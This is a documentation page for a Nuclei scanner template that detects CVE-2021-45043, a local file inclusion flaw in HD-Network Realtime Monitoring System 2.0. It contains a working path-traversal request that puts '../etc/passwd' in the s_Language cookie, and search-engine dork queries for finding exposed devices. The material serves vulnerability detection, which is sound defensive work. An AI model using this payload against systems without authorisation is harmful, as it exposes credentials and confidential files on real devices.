Skip to content
Nuclei Templates

HD-Network Realtime Monitoring System 2.0 - Local File Inclusion

ID: CVE-2021-45043

Severity: high

Author: Momen Eldawakhly,Evan Rubinstein

Tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project

Description

Section titled “Description”

Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.

YAML Source

Section titled “YAML Source”
id: CVE-2021-45043


info:
  name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
  author: Momen Eldawakhly,Evan Rubinstein
  severity: high
  description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45043
    - https://www.exploit-db.com/exploits/50588
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043
    - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45043
    cwe-id: CWE-22
    epss-score: 0.05404
    epss-percentile: 0.93125
    cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hd-network_real-time_monitoring_system_project
    product: hd-network_real-time_monitoring_system
    shodan-query: http.title:"hd-network real-time monitoring system v2.0"
    fofa-query: title="hd-network real-time monitoring system v2.0"
    google-query:
      - intitle:"HD-Network Real-time Monitoring System V2.0"
      - intitle:"hd-network real-time monitoring system v2.0"
  tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project


http:
  - raw:
      - |
        GET /language/lang HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f66e0c26406d6a52aba69d47c87bdddaabd32698e31122e8194af81f63a16c9102200f11b2f7c6338652be45397943f0959daabc3790d72a34df50c6f5b4d9dc5b39:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45043.yaml"

View on Github